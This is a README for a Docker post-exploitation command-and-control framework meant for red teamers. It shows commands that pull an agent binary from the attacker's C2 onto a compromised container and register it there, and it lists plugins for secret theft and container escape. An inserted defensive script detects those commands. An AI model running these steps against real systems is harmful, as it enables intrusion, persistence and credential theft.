Authors: Emmanuel Law, Rohit Pitke
Website: https://dockerexploitationframework.github.io
Docker Exploitation Framework is a post-exploitation aid developed for penetration testers and red teamers. The tool uses a client-server architecture and supports custom plugins for reconnaissance, persistence and lateral movement in a compromised Docker container environment (tested on standalone Docker and Kubernetes). Please visit our website to learn more.
Server installation requires a reasonably recent Python version on a publicly reachable VM/machine. This machine is the C2 (command and control, in traditional red-teaming terms). Clone this repository, cd into the installation directory and start the server:

```sh
sh start_c2.sh
```

This starts the C2 server. Record its IP address and port (default 9000).
Since this is a post-exploitation toolkit, we assume you already have shell access to a compromised Docker container. This could be in any dockerized environment, such as Kubernetes or a standalone container. Run the following command to pull the agent binary onto the container:

```sh
curl <C2_host:C2_port>/agent/download > agent
```
We have built the agent as a native binary, eliminating the need for other interpreters or compilers. The command above downloads the agent binary and saves it as `agent`. Run it as:

```sh
./agent --c2url <C2_URL>
```

Running the above command registers the agent with the C2; the rest of the operation is driven from the C2 UI in command-and-control fashion.
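For defenders, the deployment steps above leave observable traces in a container: a curl to the C2's `/agent/download` path and a process named `agent` started with `--c2url`. The following added example (not part of this project) scans constructed process-listing and shell-history lines for those two indicators and extracts the C2 endpoint; the regexes are derived only from the commands shown in this README.

```python
"""Flag DEF agent deployment indicators in container telemetry (added example)."""
import re
from typing import Dict, List

# Patterns taken from the README: `curl <C2>/agent/download > agent`
# and `./agent --c2url <C2_URL>`.
DOWNLOAD_RE = re.compile(r"curl\s+(?P<url>\S*?)/agent/download\b")
AGENT_RE = re.compile(r"(?:^|\s)\S*agent\s+--c2url\s+(?P<url>\S+)")


def scan_lines(lines: List[str], source: str) -> List[Dict[str, str]]:
    """Return one finding per line that matches either indicator."""
    findings = []
    for line in lines:
        m = DOWNLOAD_RE.search(line)
        if m:
            findings.append({"source": source, "indicator": "agent_download",
                             "c2": m.group("url"), "line": line.strip()})
        m = AGENT_RE.search(line)
        if m:
            findings.append({"source": source, "indicator": "agent_running",
                             "c2": m.group("url"), "line": line.strip()})
    return findings


def c2_endpoints(findings: List[Dict[str, str]]) -> List[str]:
    """Unique C2 host:port values, with any URL scheme stripped."""
    return sorted({re.sub(r"^\w+://", "", f["c2"]) for f in findings})


# Constructed sample telemetry (not real captures); 203.0.113.7 is a
# documentation-range address standing in for the attacker's C2.
SAMPLE_PS = [
    "  PID ARGS",
    "    1 /usr/local/bin/python app.py",
    "   42 ./agent --c2url http://203.0.113.7:9000",
    "   57 sh -c sleep 30",
]
SAMPLE_HISTORY = [
    "ls -la",
    "curl 203.0.113.7:9000/agent/download > agent",
    "chmod +x agent",
    "./agent --c2url http://203.0.113.7:9000",
]

if __name__ == "__main__":
    hits = scan_lines(SAMPLE_PS, "ps") + scan_lines(SAMPLE_HISTORY, "history")
    for hit in hits:
        print(hit)
    print("C2 endpoints:", c2_endpoints(hits))
```

In a real deployment the same functions would be fed `ps -eo pid,args` output or shell history collected from the container.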
The core of this toolkit is its plugin architecture: you can develop any plugin and push it via the C2 to agents (compromised containers) for a variety of purposes. The following plugins are already developed and available:
| Plugin | Purpose |
|---|---|
| Secret Scavenger | Find secrets in container images on a remote registry |
| Uber Shell | Automatically provision the container with the necessary CLI tools on demand |
| Kube Audit Integration | Recon the K8s cluster |
| Container Escape | Automate privilege escalation via common container breakouts |
The necessary utilities are already built, and developing your own plugin is straightforward. Each plugin contains its core logic and implements a UDP socket connection to communicate with the agent. Refer to one of the plugins in the plugins directory to understand the logic. Utility classes are available in the DEFAgent module, which covers communication between your plugin and the agent. We will soon extend the user manual to cover plugin development.
MIT
Free Software, Hell Yeah!